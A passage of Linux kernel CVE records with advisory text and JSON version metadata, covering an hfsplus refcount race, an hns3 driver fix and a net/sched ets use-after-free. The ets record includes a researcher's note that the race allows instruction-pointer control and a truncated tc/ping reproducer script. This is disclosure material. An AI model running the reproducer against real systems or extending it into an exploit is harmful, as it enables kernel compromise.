      -> hfs_bnode_split()
        -> hfs_bmap_alloc()
          -> hfs_bnode_find(tree, 0)
            -> __hfs_bnode_create(tree, 0)
```
In this case, thread A creates the bnode, sets refcnt=1, and hashes it.
Thread B also tries to create the same bnode, notices it has already
been inserted, drops its own instance, and uses the hashed one without
getting the node.
```
	node2 = hfs_bnode_findhash(tree, cnid);
	if (!node2) {				/* <- Thread A */
		hash = hfs_bnode_hash(cnid);
		node->next_hash = tree->node_hash[hash];
		tree->node_hash[hash] = node;
		tree->node_hash_cnt++;
	} else {				/* <- Thread B */
		spin_unlock(&tree->hash_lock);
		kfree(node);
		wait_event(node2->lock_wq,
			!test_bit(HFS_BNODE_NEW, &node2->flags));
		return node2;
	}
```
However, hfs_bnode_find() requires each call to take a reference.
Here both threads end up setting refcnt=1. When they later put the node,
this triggers:
BUG_ON(!atomic_read(&node->refcnt))
In this scenario, Thread B in fact finds the node in the hash table
rather than creating a new one, and thus must take a reference.
Fix this by calling hfs_bnode_get() when reusing a bnode newly created by
another thread to ensure the refcount is updated correctly.
A similar bug was fixed in HFS long ago in commit
a9dc087fd3c4 ("fix missing hfs_bnode_get() in __hfs_bnode_create")
but the same issue remained in HFS+ until now.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2, < 3b0fc7af50b896d0f3d104e70787ba1973bc0b56 (git) |
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2, < 39e149d58ef4d7883cbf87448d39d51292fd342d (git) |
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2, < b68dc4134b18a3922cd33439ec614aad4172bc86 (git) |
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2, < b9d1c6bb5f19460074ce9862cb80be86b5fb0a50 (git) |
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2, < 457f795e7abd7770de10216d7f9994a3f12a56d6 (git) |
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2, < 5882e7c8cdbb5e254a69628b780acff89c78071e (git) |
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2, < 152af114287851583cf7e0abc10129941f19466a (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/hfsplus/bnode.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3b0fc7af50b896d0f3d104e70787ba1973bc0b56",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "39e149d58ef4d7883cbf87448d39d51292fd342d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b68dc4134b18a3922cd33439ec614aad4172bc86",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b9d1c6bb5f19460074ce9862cb80be86b5fb0a50",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "457f795e7abd7770de10216d7f9994a3f12a56d6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5882e7c8cdbb5e254a69628b780acff89c78071e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "152af114287851583cf7e0abc10129941f19466a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/hfsplus/bnode.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nhfsplus: fix missing hfs_bnode_get() in __hfs_bnode_create\n\nWhen sync() and link() are called concurrently, both threads may\nenter hfs_bnode_find() without finding the node in the hash table\nand proceed to create it.\n\nThread A:\n hfsplus_write_inode()\n -\u003e hfsplus_write_system_inode()\n -\u003e hfs_btree_write()\n -\u003e hfs_bnode_find(tree, 0)\n -\u003e __hfs_bnode_create(tree, 0)\n\nThread B:\n hfsplus_create_cat()\n -\u003e hfs_brec_insert()\n -\u003e hfs_bnode_split()\n -\u003e hfs_bmap_alloc()\n -\u003e hfs_bnode_find(tree, 0)\n -\u003e __hfs_bnode_create(tree, 0)\n\nIn this case, thread A creates the bnode, sets refcnt=1, and hashes it.\nThread B also tries to create the same bnode, notices it has already\nbeen inserted, drops its own instance, and uses the hashed one without\ngetting the node.\n\n```\n\n\tnode2 = hfs_bnode_findhash(tree, cnid);\n\tif (!node2) { \u003c- Thread A\n\t\thash = hfs_bnode_hash(cnid);\n\t\tnode-\u003enext_hash = tree-\u003enode_hash[hash];\n\t\ttree-\u003enode_hash[hash] = node;\n\t\ttree-\u003enode_hash_cnt++;\n\t} else { \u003c- Thread B\n\t\tspin_unlock(\u0026tree-\u003ehash_lock);\n\t\tkfree(node);\n\t\twait_event(node2-\u003elock_wq,\n\t\t\t!test_bit(HFS_BNODE_NEW, \u0026node2-\u003eflags));\n\t\treturn node2;\n\t}\n```\n\nHowever, hfs_bnode_find() requires each call to take a reference.\nHere both threads end up setting refcnt=1. 
When they later put the node,\nthis triggers:\n\nBUG_ON(!atomic_read(\u0026node-\u003erefcnt))\n\nIn this scenario, Thread B in fact finds the node in the hash table\nrather than creating a new one, and thus must take a reference.\n\nFix this by calling hfs_bnode_get() when reusing a bnode newly created by\nanother thread to ensure the refcount is updated correctly.\n\nA similar bug was fixed in HFS long ago in commit\na9dc087fd3c4 (\"fix missing hfs_bnode_get() in __hfs_bnode_create\")\nbut the same issue remained in HFS+ until now."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:18:54.901Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3b0fc7af50b896d0f3d104e70787ba1973bc0b56"
},
{
"url": "https://git.kernel.org/stable/c/39e149d58ef4d7883cbf87448d39d51292fd342d"
},
{
"url": "https://git.kernel.org/stable/c/b68dc4134b18a3922cd33439ec614aad4172bc86"
},
{
"url": "https://git.kernel.org/stable/c/b9d1c6bb5f19460074ce9862cb80be86b5fb0a50"
},
{
"url": "https://git.kernel.org/stable/c/457f795e7abd7770de10216d7f9994a3f12a56d6"
},
{
"url": "https://git.kernel.org/stable/c/5882e7c8cdbb5e254a69628b780acff89c78071e"
},
{
"url": "https://git.kernel.org/stable/c/152af114287851583cf7e0abc10129941f19466a"
}
],
"title": "hfsplus: fix missing hfs_bnode_get() in __hfs_bnode_create",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68774",
"datePublished": "2026-01-13T15:28:51.379Z",
"dateReserved": "2025-12-24T10:30:51.035Z",
"dateUpdated": "2026-01-19T12:18:54.901Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71066 (GCVE-0-2025-71066)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-19 12:19
Title
net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change
zdi-disclosures@trendmicro.com says:
The vulnerability is a race condition between `ets_qdisc_dequeue` and
`ets_qdisc_change`. It leads to UAF on `struct Qdisc` object.
Attacker requires the capability to create new user and network namespace
in order to trigger the bug.
See my additional commentary at the end of the analysis.
Analysis:
```
static int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,
                            struct netlink_ext_ack *extack)
{
...

        // (1) this lock is preventing .change handler (`ets_qdisc_change`)
        // to race with .dequeue handler (`ets_qdisc_dequeue`)
        sch_tree_lock(sch);

        for (i = nbands; i < oldbands; i++) {
                if (i >= q->nstrict && q->classes[i].qdisc->q.qlen)
                        list_del_init(&q->classes[i].alist);
                qdisc_purge_queue(q->classes[i].qdisc);
        }

        WRITE_ONCE(q->nbands, nbands);
        for (i = nstrict; i < q->nstrict; i++) {
                if (q->classes[i].qdisc->q.qlen) {
                        // (2) the class is added to the q->active
                        list_add_tail(&q->classes[i].alist, &q->active);
                        q->classes[i].deficit = quanta[i];
                }
        }
        WRITE_ONCE(q->nstrict, nstrict);
        memcpy(q->prio2band, priomap, sizeof(priomap));

        for (i = 0; i < q->nbands; i++)
                WRITE_ONCE(q->classes[i].quantum, quanta[i]);

        for (i = oldbands; i < q->nbands; i++) {
                q->classes[i].qdisc = queues[i];
                if (q->classes[i].qdisc != &noop_qdisc)
                        qdisc_hash_add(q->classes[i].qdisc, true);
        }

        // (3) the qdisc is unlocked, now dequeue can be called in parallel
        // to the rest of .change handler
        sch_tree_unlock(sch);

        ets_offload_change(sch);
        for (i = q->nbands; i < oldbands; i++) {
                // (4) we're reducing the refcount for our class's qdisc and
                // freeing it
                qdisc_put(q->classes[i].qdisc);
                // (5) If we call .dequeue between (4) and (5), we will have
                // a strong UAF and we can control RIP
                q->classes[i].qdisc = NULL;
                WRITE_ONCE(q->classes[i].quantum, 0);
                q->classes[i].deficit = 0;
                gnet_stats_basic_sync_init(&q->classes[i].bstats);
                memset(&q->classes[i].qstats, 0, sizeof(q->classes[i].qstats));
        }
        return 0;
}
```
Comment:
This happens because some of the classes have their qdiscs assigned to
NULL, but remain in the active list. This commit fixes this issue by always
removing the class from the active list before deleting and freeing its
associated qdisc
Reproducer Steps
(trimmed version of what was sent by zdi-disclosures@trendmicro.com)
```
DEV="${DEV:-lo}"
ROOT_HANDLE="${ROOT_HANDLE:-1:}"
BAND2_HANDLE="${BAND2_HANDLE:-20:}" # child under 1:2
PING_BYTES="${PING_BYTES:-48}"
PING_COUNT="${PING_COUNT:-200000}"
PING_DST="${PING_DST:-127.0.0.1}"

SLOW_TBF_RATE="${SLOW_TBF_RATE:-8bit}"
SLOW_TBF_BURST="${SLOW_TBF_BURST:-100b}"
SLOW_TBF_LAT="${SLOW_TBF_LAT:-1s}"

cleanup() {
  tc qdisc del dev "$DEV" root 2>/dev/null
}
trap cleanup EXIT

ip link set "$DEV" up

tc qdisc del dev "$DEV" root 2>/dev/null || true

tc qdisc add dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 2

tc qdisc add dev "$DEV" parent 1:2 handle "$BAND2_HANDLE" \
  tbf rate "$SLOW_TBF_RATE" burst "$SLOW_TBF_BURST" latency "$SLOW_TBF_LAT"

tc filter add dev "$DEV" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2
tc -s qdisc ls dev $DEV

ping -I "$DEV" -f -c "$PING_COUNT" -s "$PING_BYTES" -W 0.001 "$PING_DST" \
  >/dev/null 2>&1 &
tc qdisc change dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 0
tc qdisc change dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 2
tc -s qdisc ls dev $DEV
tc qdisc del dev "$DEV" parent
```
---truncated---
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: ae2659d2c670252759ee9c823c4e039c0e05a6f2, < 062d5d544e564473450d72e6af83077c2b2ff7c3 (git) |
| Linux | Linux | Affected: e25bdbc7e951ae5728fee1f4c09485df113d013c, < c7f6e7cc14df72b997258216e99d897d2df0dbbd (git) |
| Linux | Linux | Affected: de6d25924c2a8c2988c6a385990cafbe742061bf, < a75d617a4ef08682f5cfaadc01d5141c87e019c9 (git) |
| Linux | Linux | Affected: de6d25924c2a8c2988c6a385990cafbe742061bf, < 9987cda315c08f63a02423fa2f9a1f6602c861a0 (git) |
| Linux | Linux | Affected: de6d25924c2a8c2988c6a385990cafbe742061bf, < 06bfb66a7c8b45e3fed01351a4b087410ae5ef39 (git) |
| Linux | Linux | Affected: de6d25924c2a8c2988c6a385990cafbe742061bf, < 45466141da3c98a0c5fa88be0bc14b4b6a4bd75c (git) |
| Linux | Linux | Affected: de6d25924c2a8c2988c6a385990cafbe742061bf, < ce052b9402e461a9aded599f5b47e76bc727f7de (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/sched/sch_ets.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "062d5d544e564473450d72e6af83077c2b2ff7c3",
"status": "affected",
"version": "ae2659d2c670252759ee9c823c4e039c0e05a6f2",
"versionType": "git"
},
{
"lessThan": "c7f6e7cc14df72b997258216e99d897d2df0dbbd",
"status": "affected",
"version": "e25bdbc7e951ae5728fee1f4c09485df113d013c",
"versionType": "git"
},
{
"lessThan": "a75d617a4ef08682f5cfaadc01d5141c87e019c9",
"status": "affected",
"version": "de6d25924c2a8c2988c6a385990cafbe742061bf",
"versionType": "git"
},
{
"lessThan": "9987cda315c08f63a02423fa2f9a1f6602c861a0",
"status": "affected",
"version": "de6d25924c2a8c2988c6a385990cafbe742061bf",
"versionType": "git"
},
{
"lessThan": "06bfb66a7c8b45e3fed01351a4b087410ae5ef39",
"status": "affected",
"version": "de6d25924c2a8c2988c6a385990cafbe742061bf",
"versionType": "git"
},
{
"lessThan": "45466141da3c98a0c5fa88be0bc14b4b6a4bd75c",
"status": "affected",
"version": "de6d25924c2a8c2988c6a385990cafbe742061bf",
"versionType": "git"
},
{
"lessThan": "ce052b9402e461a9aded599f5b47e76bc727f7de",
"status": "affected",
"version": "de6d25924c2a8c2988c6a385990cafbe742061bf",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/sched/sch_ets.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.16"
},
{
"lessThan": "5.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.10.83",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.15.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "5.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n\nzdi-disclosures@trendmicro.com says:\n\nThe vulnerability is a race condition between `ets_qdisc_dequeue` and\n`ets_qdisc_change`. It leads to UAF on `struct Qdisc` object.\nAttacker requires the capability to create new user and network namespace\nin order to trigger the bug.\nSee my additional commentary at the end of the analysis.\n\nAnalysis:\n\nstatic int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,\n struct netlink_ext_ack *extack)\n{\n...\n\n // (1) this lock is preventing .change handler (`ets_qdisc_change`)\n //to race with .dequeue handler (`ets_qdisc_dequeue`)\n sch_tree_lock(sch);\n\n for (i = nbands; i \u003c oldbands; i++) {\n if (i \u003e= q-\u003enstrict \u0026\u0026 q-\u003eclasses[i].qdisc-\u003eq.qlen)\n list_del_init(\u0026q-\u003eclasses[i].alist);\n qdisc_purge_queue(q-\u003eclasses[i].qdisc);\n }\n\n WRITE_ONCE(q-\u003enbands, nbands);\n for (i = nstrict; i \u003c q-\u003enstrict; i++) {\n if (q-\u003eclasses[i].qdisc-\u003eq.qlen) {\n\t\t // (2) the class is added to the q-\u003eactive\n list_add_tail(\u0026q-\u003eclasses[i].alist, \u0026q-\u003eactive);\n q-\u003eclasses[i].deficit = quanta[i];\n }\n }\n WRITE_ONCE(q-\u003enstrict, nstrict);\n memcpy(q-\u003eprio2band, priomap, sizeof(priomap));\n\n for (i = 0; i \u003c q-\u003enbands; i++)\n WRITE_ONCE(q-\u003eclasses[i].quantum, quanta[i]);\n\n for (i = oldbands; i \u003c q-\u003enbands; i++) {\n q-\u003eclasses[i].qdisc = queues[i];\n if (q-\u003eclasses[i].qdisc != \u0026noop_qdisc)\n qdisc_hash_add(q-\u003eclasses[i].qdisc, true);\n }\n\n // (3) the qdisc is unlocked, now dequeue can be called in parallel\n // to the rest of .change handler\n sch_tree_unlock(sch);\n\n ets_offload_change(sch);\n for (i = q-\u003enbands; i \u003c oldbands; i++) {\n\t // (4) we\u0027re reducing the refcount for our 
class\u0027s qdisc and\n\t // freeing it\n qdisc_put(q-\u003eclasses[i].qdisc);\n\t // (5) If we call .dequeue between (4) and (5), we will have\n\t // a strong UAF and we can control RIP\n q-\u003eclasses[i].qdisc = NULL;\n WRITE_ONCE(q-\u003eclasses[i].quantum, 0);\n q-\u003eclasses[i].deficit = 0;\n gnet_stats_basic_sync_init(\u0026q-\u003eclasses[i].bstats);\n memset(\u0026q-\u003eclasses[i].qstats, 0, sizeof(q-\u003eclasses[i].qstats));\n }\n return 0;\n}\n\nComment:\nThis happens because some of the classes have their qdiscs assigned to\nNULL, but remain in the active list. This commit fixes this issue by always\nremoving the class from the active list before deleting and freeing its\nassociated qdisc\n\nReproducer Steps\n(trimmed version of what was sent by zdi-disclosures@trendmicro.com)\n\n```\nDEV=\"${DEV:-lo}\"\nROOT_HANDLE=\"${ROOT_HANDLE:-1:}\"\nBAND2_HANDLE=\"${BAND2_HANDLE:-20:}\" # child under 1:2\nPING_BYTES=\"${PING_BYTES:-48}\"\nPING_COUNT=\"${PING_COUNT:-200000}\"\nPING_DST=\"${PING_DST:-127.0.0.1}\"\n\nSLOW_TBF_RATE=\"${SLOW_TBF_RATE:-8bit}\"\nSLOW_TBF_BURST=\"${SLOW_TBF_BURST:-100b}\"\nSLOW_TBF_LAT=\"${SLOW_TBF_LAT:-1s}\"\n\ncleanup() {\n tc qdisc del dev \"$DEV\" root 2\u003e/dev/null\n}\ntrap cleanup EXIT\n\nip link set \"$DEV\" up\n\ntc qdisc del dev \"$DEV\" root 2\u003e/dev/null || true\n\ntc qdisc add dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\n\ntc qdisc add dev \"$DEV\" parent 1:2 handle \"$BAND2_HANDLE\" \\\n tbf rate \"$SLOW_TBF_RATE\" burst \"$SLOW_TBF_BURST\" latency \"$SLOW_TBF_LAT\"\n\ntc filter add dev \"$DEV\" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2\ntc -s qdisc ls dev $DEV\n\nping -I \"$DEV\" -f -c \"$PING_COUNT\" -s \"$PING_BYTES\" -W 0.001 \"$PING_DST\" \\\n \u003e/dev/null 2\u003e\u00261 \u0026\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 0\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\ntc -s qdisc ls dev $DEV\ntc qdisc 
del dev \"$DEV\" parent \n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:28.648Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/062d5d544e564473450d72e6af83077c2b2ff7c3"
},
{
"url": "https://git.kernel.org/stable/c/c7f6e7cc14df72b997258216e99d897d2df0dbbd"
},
{
"url": "https://git.kernel.org/stable/c/a75d617a4ef08682f5cfaadc01d5141c87e019c9"
},
{
"url": "https://git.kernel.org/stable/c/9987cda315c08f63a02423fa2f9a1f6602c861a0"
},
{
"url": "https://git.kernel.org/stable/c/06bfb66a7c8b45e3fed01351a4b087410ae5ef39"
},
{
"url": "https://git.kernel.org/stable/c/45466141da3c98a0c5fa88be0bc14b4b6a4bd75c"
},
{
"url": "https://git.kernel.org/stable/c/ce052b9402e461a9aded599f5b47e76bc727f7de"
}
],
"title": "net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71066",
"datePublished": "2026-01-13T15:31:21.931Z",
"dateReserved": "2026-01-13T15:30:19.646Z",
"dateUpdated": "2026-01-19T12:19:28.648Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71064 (GCVE-0-2025-71064)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-19 12:19
Title
net: hns3: using the num_tqps in the vf driver to apply for resources
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: hns3: using the num_tqps in the vf driver to apply for resources
Currently, hdev->htqp is allocated using hdev->num_tqps, and kinfo->tqp
is allocated using kinfo->num_tqps. However, kinfo->num_tqps is set to
min(new_tqps, hdev->num_tqps); Therefore, kinfo->num_tqps may be smaller
than hdev->num_tqps, which causes some hdev->htqp[i] to remain
uninitialized in hclgevf_knic_setup().
Thus, this patch allocates hdev->htqp and kinfo->tqp using hdev->num_tqps,
ensuring that the lengths of hdev->htqp and kinfo->tqp are consistent
and that all elements are properly initialized.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: e2cb1dec9779ba2d89302a653eb0abaeb8682196, < c149decd8c18ae6acdd7a6041d74507835cf26e6 (git) |
| Linux | Linux | Affected: e2cb1dec9779ba2d89302a653eb0abaeb8682196, < bcefdb288eedac96fd2f583298927e9c6c481489 (git) |
| Linux | Linux | Affected: e2cb1dec9779ba2d89302a653eb0abaeb8682196, < 6cd8a2930df850f4600fe8c57d0662b376520281 (git) |
| Linux | Linux | Affected: e2cb1dec9779ba2d89302a653eb0abaeb8682196, < 1956d47a03eb625951e9e070db39fe2590e27510 (git) |
| Linux | Linux | Affected: e2cb1dec9779ba2d89302a653eb0abaeb8682196, < 429f946a7af3fbf08761d218746cd4afa80a7954 (git) |
| Linux | Linux | Affected: e2cb1dec9779ba2d89302a653eb0abaeb8682196, < 62f28d79a6186a602a9d926a2dbb5b12b6867df7 (git) |
| Linux | Linux | Affected: e2cb1dec9779ba2d89302a653eb0abaeb8682196, < c2a16269742e176fccdd0ef9c016a233491a49ad (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c149decd8c18ae6acdd7a6041d74507835cf26e6",
"status": "affected",
"version": "e2cb1dec9779ba2d89302a653eb0abaeb8682196",
"versionType": "git"
},
{
"lessThan": "bcefdb288eedac96fd2f583298927e9c6c481489",
"status": "affected",
"version": "e2cb1dec9779ba2d89302a653eb0abaeb8682196",
"versionType": "git"
},
{
"lessThan": "6cd8a2930df850f4600fe8c57d0662b376520281",
"status": "affected",
"version": "e2cb1dec9779ba2d89302a653eb0abaeb8682196",
"versionType": "git"
},
{
"lessThan": "1956d47a03eb625951e9e070db39fe2590e27510",
"status": "affected",
"version": "e2cb1dec9779ba2d89302a653eb0abaeb8682196",
"versionType": "git"
},
{
"lessThan": "429f946a7af3fbf08761d218746cd4afa80a7954",
"status": "affected",
"version": "e2cb1dec9779ba2d89302a653eb0abaeb8682196",
"versionType": "git"
},
{
"lessThan": "62f28d79a6186a602a9d926a2dbb5b12b6867df7",
"status": "affected",
"version": "e2cb1dec9779ba2d89302a653eb0abaeb8682196",
"versionType": "git"
},
{
"lessThan": "c2a16269742e176fccdd0ef9c016a233491a49ad",
"status": "affected",
"version": "e2cb1dec9779ba2d89302a653eb0abaeb8682196",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.16"
},
{
"lessThan": "4.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.16",
